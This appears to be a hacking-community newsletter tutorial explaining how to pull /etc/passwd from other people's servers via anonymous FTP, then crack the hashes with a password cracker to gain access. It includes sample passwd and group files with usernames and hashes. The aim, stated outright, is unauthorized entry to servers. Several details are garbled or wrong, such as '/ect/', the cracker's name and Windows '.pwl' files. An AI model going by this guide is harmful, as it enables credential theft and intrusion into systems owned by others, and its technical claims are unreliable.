HBH Newsletter

New Skills Section:

How To Get A Passwd File

WHAT:
It's easy to get a passwd (password) file, but it’s harder to get a “Good One”
Yes, a good one, there is only one “Good One”.

HOW:
The oldest method I know is the FTP://server.com.
*Note: To do this ftp the server from your browser, not sum ftp progz or anything like that.*
Then you will ftp the server anonymously and you will see something like this:

FTP Dir on server.com
---------------------
04/07/1999 12:00 Directory dev | =--- Devices
04/12/1999 12:00 Directory etc | =--- This one you want!
06/10/1998 12:00 Directory hidden | =--- Not important
03/22/2000 02:23 Directory pub | =--- Public stuff

As u can see this is a Unix system *(windows does not have /ect/)*
So we click on --= etc

FTP Dir /ect on server.com
--------------------------
04/12/1999 12:00 601 group |=--- File with group/user names
04/12/1999 12:00 509 passwd |=--- Bingo!

So we click on the passwd file.
We see something like this:

root:x:0:1:Super-User:/:/sbin/bash
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:

WHAT: This stuff is useless. The X that means that the passwd is“shadowed”
It's a shadowed passwd file, very hard to crack but there is way to do it, using a program called Deshadow
Deshadow would do the work they say, but deshadow is only to be run on your own unix box.

****
The "x" is called a token on some systems it is replaced by a "$" or "#" or sometimes even the user name.
****
So now that the passwd file is useless, we are disappointed and just for the fun of it all
we will take a look at the ---=group.
we see something like this:

root::0:root
other::1:
bin::2:root,bin,daemon
sys::3:root,bin,sys,adm
adm::4:root,adm,daemon
uucp::5:root,uucp
mail::6:root
tty::7:root,tty,adm
lp::8:root,lp,adm
nuucp::9:root,nuucp
staff::10:
daemon::12:root,daemon
sysadmin::14:
nobody::60001:
noaccess::60002:
nogroup::65534:
sponsor::26:dlamb,marci,trs,wjtifft,sndesign,bswingle,sonny
star::22:nobody,trs,marci,dlamb,wjtifft,sndesign,bswingle,grossman
cron::30:root,rwisner,trs,grossman,bcauthor,starnews,kvoa,bswingle,uurtamo
nettools::29:root,rwisner,trs,grossman,bcauthor,bswingle,uurtamo
su::27:root,rwisner,trs,grossman,bcauthor,uurtamo,bswingle
ftp::60000:

What's to say? A bunch a user names and group id's (gid).
Sometimes you will find a file called pwd.db in the /etc dir.
Okay our attempt failed to retrieve a good passwd file, so now we are going to get the “Good One”.
* Note: On windows the passwd file is called .pwl *
You can do the old FTP method on many servers, but lets talk about the Good passwd file.
We use the same example as above:

root:Npge08pfz4wuk:0:1:Super-User:/:/sbin/bash
daemon:Fs2e08p34Cxw1:1:1::/:
bin:Npge08pfz4wuk:2:2::/usr/bin:

What you see and what you should notice is the jibberish (Npge08pfz4wuk) it is an encrypted passwd.
Actually it is not encrypted but encoded.

-------PASSWD Encoded info---------
The passwd is to be encoded with randomly generated value called Salt.
There are 4096 salt values. So if you want to do a Dictionary Attack u will have to try all the values.
So the Npge08pfz4wuk, the Np is the salt and the ge08pfz4wuk is the encoded passwd.
**********************************************************************
Right about now u would want to download Jack the Ripper Great article on how to use it....
http://hellboundhackers.org/readarticle.php?article_id=45 "Its primary purpose is to detect weak UNIX passwords"
And use the Ripper to crack the passwd file.
When it is cracked u will have access to the server.
----------------------------------------------------------------------

Of course I only showed one method of getting a passwd file.
To get a passwd file the other way, you first need to find a hole in the services running at various ports of the host.
By:Hack4u

HBH Newsletter

Html Format by Anarcho-Hippie - HBHNewsletter 01